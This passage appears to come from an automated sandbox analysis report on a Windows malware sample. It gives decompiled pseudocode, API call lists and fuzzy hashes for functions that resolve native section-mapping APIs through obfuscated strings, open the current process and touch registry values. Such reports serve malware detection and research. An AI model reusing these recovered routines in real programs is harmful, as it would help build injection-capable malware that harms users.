                                                                                                                                                                                                                                                                                    					_t19 = _t38 + 0xfcb7c4; // 0x6976612e
                                                                                                                                                                                                                                                                                    					 *0xfca31c = _t18;
                                                                                                                                                                                                                                                                                    					 *0xfca390 = _t19;
                                                                                                                                                                                                                                                                                    					HeapFree( *0xfca290, 0, _t74);
                                                                                                                                                                                                                                                                                    					L48:
                                                                                                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    			}

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • StrToIntExA.SHLWAPI(00000000,00000000,00FC2F44,?,00FC2F44,63699BC3,?,00FC2F44,63699BC3,E8FA7DD7,00FCA00C,745EC740,?,?,00FC2F44), ref: 00FC37D0
                                                                                                                                                                                                                                                                                    • StrToIntExA.SHLWAPI(00000000,00000000,00FC2F44,?,00FC2F44,63699BC3,?,00FC2F44,63699BC3,E8FA7DD7,00FCA00C,745EC740,?,?,00FC2F44), ref: 00FC3802
                                                                                                                                                                                                                                                                                    • StrToIntExA.SHLWAPI(00000000,00000000,00FC2F44,?,00FC2F44,63699BC3,?,00FC2F44,63699BC3,E8FA7DD7,00FCA00C,745EC740,?,?,00FC2F44), ref: 00FC3834
                                                                                                                                                                                                                                                                                    • StrToIntExA.SHLWAPI(00000000,00000000,00FC2F44,?,00FC2F44,63699BC3,?,00FC2F44,63699BC3,E8FA7DD7,00FCA00C,745EC740,?,?,00FC2F44), ref: 00FC3866
                                                                                                                                                                                                                                                                                    • StrToIntExA.SHLWAPI(00000000,00000000,00FC2F44,?,00FC2F44,63699BC3,?,00FC2F44,63699BC3,E8FA7DD7,00FCA00C,745EC740,?,?,00FC2F44), ref: 00FC3898
                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,?,00FC2F44,63699BC3,?,00FC2F44,63699BC3,E8FA7DD7,00FCA00C,745EC740,?,?,00FC2F44), ref: 00FC3934
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: FreeHeap
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3298025750-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 2641bf7053616ec7c46ff74f99b7c15da73615e8674fd6968ecbc3f0d42afe35
                                                                                                                                                                                                                                                                                    • Instruction ID: 5ad15f4d92f3e79b93064fbd86f4ddfaf9a068f4b44b55834414ec82d9e72e72
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2641bf7053616ec7c46ff74f99b7c15da73615e8674fd6968ecbc3f0d42afe35
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E051E6B2E0011EAADB10DBB9DF87E9F77E99B48784724891DB401D3144E635EF00BB21
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 00FC2C4F
                                                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(0070006F), ref: 00FC2C63
                                                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 00FC2C75
                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00FC2CD9
                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00FC2CE8
                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00FC2CF3
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: String$AllocFree
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 344208780-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 428d6ee6c2ff010569fa192d55b8b9100f5329e3cfd50040180e39e05941677c
                                                                                                                                                                                                                                                                                    • Instruction ID: 6b65e42c1864792da214204e6bf3412e0247b987a3d56e05d2439bf1a1ef0c1c
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 428d6ee6c2ff010569fa192d55b8b9100f5329e3cfd50040180e39e05941677c
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6F318032D0060AABDB41DFB8CA4AA9FB7B6EF49310F144429ED10EB120DB759E05DB91
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E00FC71A3(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                                                    				intOrPtr _t23;
                                                                                                                                                                                                                                                                                    				intOrPtr _t26;
                                                                                                                                                                                                                                                                                    				_Unknown_base(*)()* _t28;
                                                                                                                                                                                                                                                                                    				intOrPtr _t30;
                                                                                                                                                                                                                                                                                    				_Unknown_base(*)()* _t32;
                                                                                                                                                                                                                                                                                    				intOrPtr _t33;
                                                                                                                                                                                                                                                                                    				_Unknown_base(*)()* _t35;
                                                                                                                                                                                                                                                                                    				intOrPtr _t36;
                                                                                                                                                                                                                                                                                    				_Unknown_base(*)()* _t38;
                                                                                                                                                                                                                                                                                    				intOrPtr _t39;
                                                                                                                                                                                                                                                                                    				_Unknown_base(*)()* _t41;
                                                                                                                                                                                                                                                                                    				intOrPtr _t44;
                                                                                                                                                                                                                                                                                    				struct HINSTANCE__* _t48;
                                                                                                                                                                                                                                                                                    				intOrPtr _t54;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t54 = E00FC5C4E(0x20);
                                                                                                                                                                                                                                                                                    				if(_t54 == 0) {
                                                                                                                                                                                                                                                                                    					_v8 = 8;
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					_t23 =  *0xfca2d0; // 0x292d5a8
                                                                                                                                                                                                                                                                                    					_t1 = _t23 + 0xfcb11a; // 0x4c44544e
                                                                                                                                                                                                                                                                                    					_t48 = GetModuleHandleA(_t1);
                                                                                                                                                                                                                                                                                    					_t26 =  *0xfca2d0; // 0x292d5a8
                                                                                                                                                                                                                                                                                    					_t2 = _t26 + 0xfcb787; // 0x7243775a
                                                                                                                                                                                                                                                                                    					_v8 = 0x7f;
                                                                                                                                                                                                                                                                                    					_t28 = GetProcAddress(_t48, _t2);
                                                                                                                                                                                                                                                                                    					 *(_t54 + 0xc) = _t28;
                                                                                                                                                                                                                                                                                    					if(_t28 == 0) {
                                                                                                                                                                                                                                                                                    						L8:
                                                                                                                                                                                                                                                                                    						E00FC2A03(_t54);
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						_t30 =  *0xfca2d0; // 0x292d5a8
                                                                                                                                                                                                                                                                                    						_t5 = _t30 + 0xfcb774; // 0x614d775a
                                                                                                                                                                                                                                                                                    						_t32 = GetProcAddress(_t48, _t5);
                                                                                                                                                                                                                                                                                    						 *(_t54 + 0x10) = _t32;
                                                                                                                                                                                                                                                                                    						if(_t32 == 0) {
                                                                                                                                                                                                                                                                                    							goto L8;
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							_t33 =  *0xfca2d0; // 0x292d5a8
                                                                                                                                                                                                                                                                                    							_t7 = _t33 + 0xfcb797; // 0x6e55775a
                                                                                                                                                                                                                                                                                    							_t35 = GetProcAddress(_t48, _t7);
                                                                                                                                                                                                                                                                                    							 *(_t54 + 0x14) = _t35;
                                                                                                                                                                                                                                                                                    							if(_t35 == 0) {
                                                                                                                                                                                                                                                                                    								goto L8;
                                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                                    								_t36 =  *0xfca2d0; // 0x292d5a8
                                                                                                                                                                                                                                                                                    								_t9 = _t36 + 0xfcb756; // 0x4e6c7452
                                                                                                                                                                                                                                                                                    								_t38 = GetProcAddress(_t48, _t9);
                                                                                                                                                                                                                                                                                    								 *(_t54 + 0x18) = _t38;
                                                                                                                                                                                                                                                                                    								if(_t38 == 0) {
                                                                                                                                                                                                                                                                                    									goto L8;
                                                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                                                    									_t39 =  *0xfca2d0; // 0x292d5a8
                                                                                                                                                                                                                                                                                    									_t11 = _t39 + 0xfcb7ac; // 0x6c43775a
                                                                                                                                                                                                                                                                                    									_t41 = GetProcAddress(_t48, _t11);
                                                                                                                                                                                                                                                                                    									 *(_t54 + 0x1c) = _t41;
                                                                                                                                                                                                                                                                                    									if(_t41 == 0) {
                                                                                                                                                                                                                                                                                    										goto L8;
                                                                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                                                                    										 *((intOrPtr*)(_t54 + 4)) = _a4;
                                                                                                                                                                                                                                                                                    										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                                                                                                                                                                                                                                                                                    										_t44 = E00FC225C(_t54, _a8);
                                                                                                                                                                                                                                                                                    										_v8 = _t44;
                                                                                                                                                                                                                                                                                    										if(_t44 != 0) {
                                                                                                                                                                                                                                                                                    											goto L8;
                                                                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                                                                    											 *_a12 = _t54;
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _v8;
                                                                                                                                                                                                                                                                                    			}



















                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC5C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00FC3FAA), ref: 00FC5C5A
                                                                                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(4C44544E,00000020,74183966,00000000,00000000,?,?,?,00FC7852,?,?,?,?,00000000,00000000), ref: 00FC71C8
                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,7243775A), ref: 00FC71EA
                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,614D775A), ref: 00FC7200
                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00FC7216
                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00FC722C
                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00FC7242
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC225C: memset.NTDLL ref: 00FC22DB
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true
• Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp
• Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp
• Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp
• Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: AddressProc$AllocateHandleHeapModulememset
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1886625739-0
                                                                                                                                                                                                                                                                                    • Opcode ID: a6350950c5616e17c028280f31c3077b5fcdd6caf5c7a51ac267217df5bd4353
                                                                                                                                                                                                                                                                                    • Instruction ID: 8332fdd5f804780f0826a9dbab37e923041b684451b572a4105c1cfecc9dc0d5
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a6350950c5616e17c028280f31c3077b5fcdd6caf5c7a51ac267217df5bd4353
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 49212BB190430ADFDB20EF69CE46EA6B7E8EB45754B044059B805C7221D735E905AFB0
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 32%
                                                                                                                                                                                                                                                                                    			E00FC63CD(intOrPtr __eax, intOrPtr __edi, long _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                                    				intOrPtr _v36;
                                                                                                                                                                                                                                                                                    				intOrPtr _v44;
                                                                                                                                                                                                                                                                                    				intOrPtr _v48;
                                                                                                                                                                                                                                                                                    				intOrPtr _v52;
                                                                                                                                                                                                                                                                                    				void _v60;
                                                                                                                                                                                                                                                                                    				char _v64;
                                                                                                                                                                                                                                                                                    				long _t18;
                                                                                                                                                                                                                                                                                    				intOrPtr _t22;
                                                                                                                                                                                                                                                                                    				intOrPtr _t23;
                                                                                                                                                                                                                                                                                    				long _t29;
                                                                                                                                                                                                                                                                                    				intOrPtr _t30;
                                                                                                                                                                                                                                                                                    				intOrPtr _t31;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t32;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t30 = __edi;
                                                                                                                                                                                                                                                                                    				_t29 = _a4;
                                                                                                                                                                                                                                                                                    				_t31 = __eax;
                                                                                                                                                                                                                                                                                    				_t18 = E00FC2BF3(_t29, __edi, __eax);
                                                                                                                                                                                                                                                                                    				_a4 = _t18;
                                                                                                                                                                                                                                                                                    				if(_t18 != 0) {
                                                                                                                                                                                                                                                                                    					memset( &_v60, 0, 0x38);
                                                                                                                                                                                                                                                                                    					_t22 =  *0xfca2d0; // 0x292d5a8
                                                                                                                                                                                                                                                                                    					_v64 = 0x3c;
                                                                                                                                                                                                                                                                                    					if(_a8 == 0) {
                                                                                                                                                                                                                                                                                    						_t7 = _t22 + 0xfcb4e0; // 0x70006f
                                                                                                                                                                                                                                                                                    						_t23 = _t7;
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						_t6 = _t22 + 0xfcb92c; // 0x750072
                                                                                                                                                                                                                                                                                    						_t23 = _t6;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_v36 = _t31;
                                                                                                                                                                                                                                                                                    					_t32 = __imp__;
                                                                                                                                                                                                                                                                                    					_v52 = _t23;
                                                                                                                                                                                                                                                                                    					_v48 = _t29;
                                                                                                                                                                                                                                                                                    					_v44 = _t30;
                                                                                                                                                                                                                                                                                    					 *_t32(0);
                                                                                                                                                                                                                                                                                    					_push( &_v64);
                                                                                                                                                                                                                                                                                    					if( *0xfca100() != 0) {
                                                                                                                                                                                                                                                                                    						_a4 = _a4 & 0x00000000;
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						_a4 = GetLastError();
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					 *_t32(1);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _a4;
                                                                                                                                                                                                                                                                                    			}

















                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC2BF3: SysAllocString.OLEAUT32(?), ref: 00FC2C4F
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC2BF3: SysAllocString.OLEAUT32(0070006F), ref: 00FC2C63
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC2BF3: SysAllocString.OLEAUT32(00000000), ref: 00FC2C75
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC2BF3: SysFreeString.OLEAUT32(00000000), ref: 00FC2CD9
                                                                                                                                                                                                                                                                                    • memset.NTDLL ref: 00FC63F1
                                                                                                                                                                                                                                                                                    • Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 00FC642D
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00FC643D
                                                                                                                                                                                                                                                                                    • Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 00FC644E
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: StringWow64$Alloc$EnableRedirection$ErrorFreeLastmemset
                                                                                                                                                                                                                                                                                    • String ID: <
                                                                                                                                                                                                                                                                                    • API String ID: 593937197-4251816714
                                                                                                                                                                                                                                                                                    • Opcode ID: 94c15dd785df50ad1a6e155171be108d5dedee4ccb686b8d9d38633b5332fa15
                                                                                                                                                                                                                                                                                    • Instruction ID: 222a59815cb905f2ecf58a24dfb5e65f4f0f0da5675ec570f472cd3203d0378b
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 94c15dd785df50ad1a6e155171be108d5dedee4ccb686b8d9d38633b5332fa15
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D9113971D04218ABDB14DFA9DD8BFE97BF8BB08394F04802AF905E7251D774A504EBA1
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E00FC2A18(intOrPtr _a4) {
                                                                                                                                                                                                                                                                                    				void* _t2;
                                                                                                                                                                                                                                                                                    				long _t4;
                                                                                                                                                                                                                                                                                    				void* _t5;
                                                                                                                                                                                                                                                                                    				long _t6;
                                                                                                                                                                                                                                                                                    				void* _t7;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t2 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                                                                    				 *0xfca2c4 = _t2;
                                                                                                                                                                                                                                                                                    				if(_t2 == 0) {
                                                                                                                                                                                                                                                                                    					return GetLastError();
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t4 = GetVersion();
                                                                                                                                                                                                                                                                                    				if(_t4 <= 5) {
                                                                                                                                                                                                                                                                                    					_t5 = 0x32;
                                                                                                                                                                                                                                                                                    					return _t5;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				 *0xfca2b4 = _t4;
                                                                                                                                                                                                                                                                                    				_t6 = GetCurrentProcessId();
                                                                                                                                                                                                                                                                                    				 *0xfca2b0 = _t6;
                                                                                                                                                                                                                                                                                    				 *0xfca2bc = _a4;
                                                                                                                                                                                                                                                                                    				_t7 = OpenProcess(0x10047a, 0, _t6);
                                                                                                                                                                                                                                                                                    				 *0xfca2ac = _t7;
                                                                                                                                                                                                                                                                                    				if(_t7 == 0) {
                                                                                                                                                                                                                                                                                    					 *0xfca2ac =  *0xfca2ac | 0xffffffff;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return 0;
                                                                                                                                                                                                                                                                                    			}









                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00FC446F,?,?,00000001), ref: 00FC2A20
                                                                                                                                                                                                                                                                                    • GetVersion.KERNEL32(?,00000001), ref: 00FC2A2F
                                                                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(?,00000001), ref: 00FC2A3E
                                                                                                                                                                                                                                                                                    • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001), ref: 00FC2A5B
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000001), ref: 00FC2A7A
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true
• Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp
• Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp
• Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp
• Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2270775618-0
                                                                                                                                                                                                                                                                                    • Opcode ID: be284f6cfb3090a61a4fea423c8b5c131099a0b349a42bef41d1af223eaec9aa
                                                                                                                                                                                                                                                                                    • Instruction ID: 59f4996b96340c094d6a82f8eef728a9b88aaadc37e445343ec9129cb5a9e24e
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: be284f6cfb3090a61a4fea423c8b5c131099a0b349a42bef41d1af223eaec9aa
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5CF0F471A8931AAFD3608F75AF0BF553AA4B704B54F104519E247C72E0D6B56400AF1A
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 88%
                                                                                                                                                                                                                                                                                    			E00FC202E(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
                                                                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                                                                    				char _v12;
                                                                                                                                                                                                                                                                                    				signed int* _v16;
                                                                                                                                                                                                                                                                                    				char _v284;
                                                                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                                                                    				char* _t60;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t61;
                                                                                                                                                                                                                                                                                    				intOrPtr _t65;
                                                                                                                                                                                                                                                                                    				char _t68;
                                                                                                                                                                                                                                                                                    				intOrPtr _t72;
                                                                                                                                                                                                                                                                                    				intOrPtr _t73;
                                                                                                                                                                                                                                                                                    				intOrPtr _t75;
                                                                                                                                                                                                                                                                                    				void* _t78;
                                                                                                                                                                                                                                                                                    				void* _t88;
                                                                                                                                                                                                                                                                                    				void* _t97;
                                                                                                                                                                                                                                                                                    				void* _t98;
                                                                                                                                                                                                                                                                                    				char _t104;
                                                                                                                                                                                                                                                                                    				signed int* _t106;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t107;
                                                                                                                                                                                                                                                                                    				void* _t108;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t98 = __ecx;
                                                                                                                                                                                                                                                                                    				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                                                                                                    				_t104 = _a16;
                                                                                                                                                                                                                                                                                    				if(_t104 == 0) {
                                                                                                                                                                                                                                                                                    					__imp__( &_v284,  *0xfca38c);
                                                                                                                                                                                                                                                                                    					_t97 = 0x80000002;
                                                                                                                                                                                                                                                                                    					L6:
                                                                                                                                                                                                                                                                                    					_t60 = E00FC33FA(0,  &_v284);
                                                                                                                                                                                                                                                                                    					_a8 = _t60;
                                                                                                                                                                                                                                                                                    					if(_t60 == 0) {
                                                                                                                                                                                                                                                                                    						_v8 = 8;
                                                                                                                                                                                                                                                                                    						L29:
                                                                                                                                                                                                                                                                                    						_t61 = _a20;
                                                                                                                                                                                                                                                                                    						if(_t61 != 0) {
                                                                                                                                                                                                                                                                                    							 *_t61 =  *_t61 + 1;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						return _v8;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_t107 = _a24;
                                                                                                                                                                                                                                                                                    					if(E00FC4B4F(_t98, _t103, _t107, _t97, _t60) != 0) {
                                                                                                                                                                                                                                                                                    						L27:
                                                                                                                                                                                                                                                                                    						E00FC2A03(_a8);
                                                                                                                                                                                                                                                                                    						goto L29;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_t65 =  *0xfca2d0; // 0x292d5a8
                                                                                                                                                                                                                                                                                    					_t16 = _t65 + 0xfcb908; // 0x65696c43
                                                                                                                                                                                                                                                                                    					_t68 = E00FC33FA(0, _t16);
                                                                                                                                                                                                                                                                                    					_a24 = _t68;
                                                                                                                                                                                                                                                                                    					if(_t68 == 0) {
                                                                                                                                                                                                                                                                                    						L14:
                                                                                                                                                                                                                                                                                    						_t29 = _t107 + 0x14; // 0x102
                                                                                                                                                                                                                                                                                    						_t33 = _t107 + 0x10; // 0x3d00fc90
                                                                                                                                                                                                                                                                                    						if(E00FC5C15(_t103,  *_t33, _t97, _a8,  *0xfca384,  *((intOrPtr*)( *_t29 + 0x28))) == 0) {
                                                                                                                                                                                                                                                                                    							_t72 =  *0xfca2d0; // 0x292d5a8
                                                                                                                                                                                                                                                                                    							if(_t104 == 0) {
                                                                                                                                                                                                                                                                                    								_t35 = _t72 + 0xfcba0f; // 0x4d4c4b48
                                                                                                                                                                                                                                                                                    								_t73 = _t35;
                                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                                    								_t34 = _t72 + 0xfcb927; // 0x55434b48
                                                                                                                                                                                                                                                                                    								_t73 = _t34;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							if(E00FC762C(_t73,  *0xfca384,  *0xfca388,  &_a24,  &_a16) == 0) {
                                                                                                                                                                                                                                                                                    								if(_t104 == 0) {
                                                                                                                                                                                                                                                                                    									_t75 =  *0xfca2d0; // 0x292d5a8
                                                                                                                                                                                                                                                                                    									_t44 = _t75 + 0xfcb893; // 0x74666f53
                                                                                                                                                                                                                                                                                    									_t78 = E00FC33FA(0, _t44);
                                                                                                                                                                                                                                                                                    									_t105 = _t78;
                                                                                                                                                                                                                                                                                    									if(_t78 == 0) {
                                                                                                                                                                                                                                                                                    										_v8 = 8;
                                                                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                                                                    										_t47 = _t107 + 0x10; // 0x3d00fc90
                                                                                                                                                                                                                                                                                    										E00FC33B7( *_t47, _t97, _a8,  *0xfca388, _a24);
                                                                                                                                                                                                                                                                                    										_t49 = _t107 + 0x10; // 0x3d00fc90
                                                                                                                                                                                                                                                                                    										E00FC33B7( *_t49, _t97, _t105,  *0xfca380, _a16);
                                                                                                                                                                                                                                                                                    										E00FC2A03(_t105);
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                                                    									_t40 = _t107 + 0x10; // 0x3d00fc90
                                                                                                                                                                                                                                                                                    									E00FC33B7( *_t40, _t97, _a8,  *0xfca388, _a24);
                                                                                                                                                                                                                                                                                    									_t43 = _t107 + 0x10; // 0x3d00fc90
                                                                                                                                                                                                                                                                                    									E00FC33B7( *_t43, _t97, _a8,  *0xfca380, _a16);
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								if( *_t107 != 0) {
                                                                                                                                                                                                                                                                                    									E00FC2A03(_a24);
                                                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                                                    									 *_t107 = _a16;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						goto L27;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_t21 = _t107 + 0x10; // 0x3d00fc90
                                                                                                                                                                                                                                                                                    					if(E00FC5419( *_t21, _t97, _a8, _t68,  &_v16,  &_v12) == 0) {
                                                                                                                                                                                                                                                                                    						_t106 = _v16;
                                                                                                                                                                                                                                                                                    						_t88 = 0x28;
                                                                                                                                                                                                                                                                                    						if(_v12 == _t88) {
                                                                                                                                                                                                                                                                                    							 *_t106 =  *_t106 & 0x00000000;
                                                                                                                                                                                                                                                                                    							_t26 = _t107 + 0x10; // 0x3d00fc90
                                                                                                                                                                                                                                                                                    							E00FC5C15(_t103,  *_t26, _t97, _a8, _a24, _t106);
                                                                                                                                                                                                                                                                                    						}
